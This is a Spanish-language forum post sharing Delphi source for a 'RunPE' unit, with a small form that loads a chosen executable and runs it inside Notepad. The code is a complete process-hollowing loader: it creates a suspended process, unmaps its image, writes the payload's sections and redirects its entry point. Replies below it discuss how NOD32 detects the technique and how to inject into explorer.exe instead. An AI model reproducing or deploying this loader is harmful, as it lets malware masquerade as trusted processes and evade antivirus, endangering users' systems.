unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs,unit2, StdCtrls;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Edit1: TEdit;
    Button2: TButton;
    Memo1: TMemo;
    OpenDialog1: TOpenDialog;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  bBuff:  TByteArray;
implementation

{$R *.dfm}
  function FileToBytes(sPath:string; var bFile:TByteArray):Boolean;
var
  hFile:  THandle;
  dSize:  DWORD;
  dRead:  DWORD;
begin
  Result := FALSE;
  hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
  if hFile <> INVALID_HANDLE_VALUE then
  begin
    dSize := GetFileSize(hFile, nil);
    SetLength(bFile, dSize);
    ReadFile(hFile, bFile[0], dSize, dRead, nil);
    CloseHandle(hFile);

    if dRead = dSize then
      Result := TRUE;
  end;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
  FileToBytes(edit1.text, bBuff) 

     RunExe('C:\WINDOWS\Notepad.exe', bBuff);
   
 end;
procedure TForm1.Button2Click(Sender: TObject);
begin
if opendialog1.execute then
edit1.Text:=opendialog1.filename;
end;

end.
unit Unit2;
{
  Unit Name: uRunPE  
  Author: Anonymous 
  Description: Run Executables as Byte Arrays 
  Original: freevbcode.com/ShowCode.asp?ID=8385 
  Ported by: steve10120 
  Website: hackhound.org 
  History: First try 
} 
 
//UNIT
//unit uRunPE;

interface

uses Windows;

type
  TByteArray = array of Byte;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll';

implementation

procedure Move(Destination, Source: Pointer; dLength:Cardinal);
begin
  CopyMemory(Destination, Source, dLength);
end;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
var
  IDH:        TImageDosHeader;
  INH:        TImageNtHeaders;
  ISH:        TImageSectionHeader;
  PI:         TProcessInformation;
  SI:         TStartUpInfo;
  CONT:       TContext;
  ImageBase:  Pointer;
  Ret:        DWORD;
  i:          integer;
  Addr:       DWORD;
  dOffset:    DWORD;
begin
  Result := FALSE;
  try
    Move(@IDH, @bFile[0], 64);
    if IDH.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      Move(@INH, @bFile[IDH._lfanew], 248);
      if INH.Signature = IMAGE_NT_SIGNATURE then
      begin
        FillChar(SI, SizeOf(TStartupInfo),#0);
        FillChar(PI, SizeOf(TProcessInformation),#0);
        SI.cb := SizeOf(TStartupInfo);
        if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
        begin
          CONT.ContextFlags := CONTEXT_FULL;
          if GetThreadContext(PI.hThread, CONT) then
          begin
            ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
            NtUnmapViewOfSection(PI.hProcess, @Addr);
            ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
            WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret);
            dOffset := IDH._lfanew + 248;
            for i := 0 to INH.FileHeader.NumberOfSections - 1 do
            begin
              Move(@ISH, @bFile[dOffset + (i * 40)], 40);
              WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret);
              VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr);
            end;
            WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
            CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
            SetThreadContext(PI.hThread, CONT);
            ResumeThread(PI.hThread);
            Result := TRUE;
          end;
        end;
      end;
    end;
  except
    CloseHandle(PI.hProcess);
    CloseHandle(PI.hThread);
  end;
end;

end.
paresco malo ,pero soy bueno
Aunque no Domini Delphi, creo que va a ser de mucha utilidad. Gracias
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
si estoy viendo cla proactiva de nod32 , pero esta inyeccion (runpe)crea un proceso nuevo y se inyecta , lo que parece que nod lo detecta, asi que no sirve para proactiva
estoy probando traducir codigo c+ para inyectar en el proceso original explorer.exe me parece que el secreto esta en como se cargan las apis en el proceso victima y el relocation base addres(no me parece, asi lo explico en 2010 zero de elhackernet ).

pd
el 30% bueno de cpu del pentium 4 que me queda se esta comiendo todos los acces violation de esta prueba jajaja.
paresco malo ,pero soy bueno
Responder

Volver a “Fuentes”